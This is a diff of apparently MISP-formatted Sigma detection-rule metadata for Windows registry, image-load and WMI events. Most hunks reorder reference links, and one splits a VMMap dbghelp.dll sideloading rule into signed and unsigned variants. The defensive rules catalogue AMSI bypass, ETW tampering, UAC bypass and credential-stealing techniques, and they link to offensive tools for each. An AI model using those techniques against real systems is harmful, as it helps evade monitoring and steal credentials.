- "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650",
 "https://youtu.be/zSihR3lTf7g",
+ "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml"
 ],
 "tags": [
@@ -22258,10 +22580,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml"
 ],
 "tags": [
@@ -22327,9 +22649,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
 "https://unit42.paloaltonetworks.com/ransomware-families/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml"
 ],
 "tags": [
@@ -22360,8 +22682,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
+ "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml"
 ],
 "tags": [
@@ -22504,9 +22826,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
- "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
 "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
+ "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
+ "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml"
 ],
 "tags": [
@@ -22529,10 +22851,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
- "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
 "https://github.com/elastic/detection-rules/issues/1371",
 "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
+ "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
+ "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml"
 ],
 "tags": [
@@ -22573,8 +22895,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/",
 "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html",
+ "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml"
 ],
 "tags": [
@@ -22640,10 +22962,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md",
- "https://twitter.com/nas_bench/status/1626648985824788480",
 "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/",
 "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md",
+ "https://twitter.com/nas_bench/status/1626648985824788480",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml"
 ],
 "tags": [
@@ -22710,9 +23032,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml"
 ],
 "tags": [
@@ -22735,17 +23057,17 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
- "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "https://bunnyinside.com/?term=f71e8cb9c76a",
 "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
 "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://bunnyinside.com/?term=f71e8cb9c76a",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
+ "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml"
 ],
 "tags": [
@@ -22820,9 +23142,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml"
 ],
 "tags": [
@@ -22855,8 +23177,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade",
+ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml"
 ],
 "tags": [
@@ -22922,9 +23244,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml"
 ],
 "tags": [
@@ -22957,8 +23279,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass",
 "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/",
+ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml"
 ],
 "tags": [
@@ -22991,10 +23313,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/ifilters.html",
 "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
- "https://github.com/gtworek/PSBits/tree/master/IFilter",
+ "https://persistence-info.github.io/Data/ifilters.html",
 "https://twitter.com/0gtweet/status/1468548924600459267",
+ "https://github.com/gtworek/PSBits/tree/master/IFilter",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml"
 ],
 "tags": [
@@ -23050,8 +23372,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://forensafe.com/blogs/typedpaths.html",
 "https://twitter.com/dez_/status/1560101453150257154",
+ "https://forensafe.com/blogs/typedpaths.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml"
 ],
 "tags": [
@@ -23110,9 +23432,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
 "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
 "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
- "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml"
 ],
 "tags": [
@@ -23147,9 +23469,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html",
- "https://twitter.com/dez_/status/986614411711442944",
 "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
+ "https://twitter.com/dez_/status/986614411711442944",
+ "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"
 ],
 "tags": [
@@ -23386,8 +23708,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_svchost_dlls.yml" ], "tags": [ @@ -23430,8 +23752,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" ], @@ -23511,10 +23833,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", - "https://twitter.com/chadtilbury/status/1275851297770610688", "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], "tags": [ 
@@ -23752,9 +24074,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", - "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", - "https://github.com/S12cybersecurity/RDPCredentialStealer", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/S12cybersecurity/RDPCredentialStealer", + "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_credui_uncommon_process_load.yml" ], "tags": [ @@ -23788,8 +24110,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" ], "tags": [ @@ -24025,8 +24347,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_drawing_load.yml" ], "tags": [ 
@@ -24059,9 +24381,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://github.com/TheD1rkMtr/AMSI_patch", "https://github.com/surya-dev-singh/AmsiBypass-OpenSession", "https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9", - "https://github.com/TheD1rkMtr/AMSI_patch", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_uncommon_process.yml" ], "tags": [ @@ -24255,11 +24577,11 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], @@ -24346,8 +24668,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "Internal Research", + "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" ], "tags": [ 
@@ -24518,6 +24840,49 @@ "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "value": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE" }, + { + "description": "Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_vmmap_dbghelp_signed.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "related": [ + { + "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "98ffaed4-aec2-4e04-9b07-31492fe68b3d", + "value": "VMMap Signed Dbghelp.DLL Potential Sideloading" + }, { "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.)", "meta": { 
@@ -24531,10 +24896,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://hijacklibs.net/", - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -24577,8 +24942,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", + "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml" ], "tags": [ @@ -24611,8 +24976,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/am0nsec/status/1412232114980982787", "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml" ], "tags": [ 
@@ -24840,49 +25205,6 @@ "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "value": "Potential Antivirus Software DLL Sideloading" }, - { - "description": "Detects potential DLL sideloading of dbghelp.dll by the Sysinternals VMMap.", - "meta": { - "author": "Nasreddine Bencherchali (Nextron Systems)", - "creation_date": "2023/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_vmmap_dbghelp.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "related": [ - { - "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "273a8dd8-3742-4302-bcc7-7df5a80fe425", - "value": "VMMap Dbghelp.DLL Potential Sideloading" - }, { "description": "Detects any assembly DLL being loaded by an Office Product", "meta": { @@ -24972,8 +25294,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", + "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" ], "tags": [ 
@@ -25232,10 +25554,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://thewover.github.io/Introducing-Donut/", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/tyranid/DotNetToJScript", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://thewover.github.io/Introducing-Donut/", + "https://github.com/tyranid/DotNetToJScript", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ 
@@ -25256,6 +25578,49 @@ "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", "value": "DotNet CLR DLL Loaded By Scripting Applications" }, + { + "description": "Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_vmmap_dbghelp_unsigned.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "related": [ + { + "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "273a8dd8-3742-4302-bcc7-7df5a80fe425", + "value": "VMMap Unsigned Dbghelp.DLL Potential Sideloading" + }, { "description": "Detects potential DLL sideloading of \"CCleanerReactivator.dll\"", "meta": { 
@@ -25345,9 +25710,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml" ], "tags": [ @@ -25380,9 +25745,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", - "https://twitter.com/WhichbufferArda/status/1658829954182774784", "https://securelist.com/apt-luminousmoth/103332/", + "https://twitter.com/WhichbufferArda/status/1658829954182774784", + "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wwlib.yml" ], "tags": [ @@ -25545,8 +25910,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/t3ft3lb/status/1656194831830401024", "https://twitter.com/StopMalvertisin/status/1648604148848549888", + "https://twitter.com/t3ft3lb/status/1656194831830401024", "https://www.roboform.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml" ], 
@@ -25688,8 +26053,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html", "https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html", + "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml" ], "tags": [ @@ -26466,9 +26831,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/oulusoyum/status/1191329746069655553", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" ], "tags": [ @@ -26585,8 +26950,8 @@ "logsource.product": "windows", "refs": [ "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ 
